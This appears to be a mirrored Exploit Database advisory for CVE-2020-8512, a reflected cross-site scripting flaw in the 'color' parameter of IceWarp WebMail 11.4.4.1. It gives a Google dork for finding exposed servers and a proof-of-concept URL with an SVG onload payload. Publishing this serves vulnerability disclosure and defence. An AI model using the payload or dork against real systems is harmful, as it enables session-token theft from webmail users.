IceWarp WebMail 11.4.4.1 – Reflective Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： Lutfu Mert Ceylan
  日期： 2020-02-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47988/

• # Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
  # Date: 2020-01-27
  # Author: Lutfu Mert Ceylan
  # Vendor Homepage: www.icewarp.com
  # Tested on: Windows 10
  # Versions: 11.4.4.1 and before
  # Vulnerable Parameter: "color" (Get Method)
  # Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
  # CVE: CVE-2020-8512
  
  # Notes:
  
  # An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and
  # before)to send a malicious script to an unsuspecting Admins or users. The
  # end admins or useras browser has no way to know that the script should not
  # be trusted, and will execute the script. Because it thinks the script came
  # from a trusted source, the malicious script can access any cookies, session
  # tokens, or other sensitive information retained by the browser and used
  # with that site. These scripts can even rewrite the content of the HTML
  # page. Even an attacker can easily place users in social engineering through
  # this vulnerability and create a fake field.
  
  # PoC:
  
  # Go to Sign-in page through this path: http://localhost/webmail/ or
  http://localhost:32000/webmail/
  
  # Add the "color" parameter to the URL and write malicious code, Example:
  http://localhost/webmail/?color="><svg/onload=alert(1)>
  
  # When the user goes to the URL, the malicious code is executed
  
  Example Vulnerable URL: http://localhost/webmail/?color=
  "><svg/onload=alert(1)>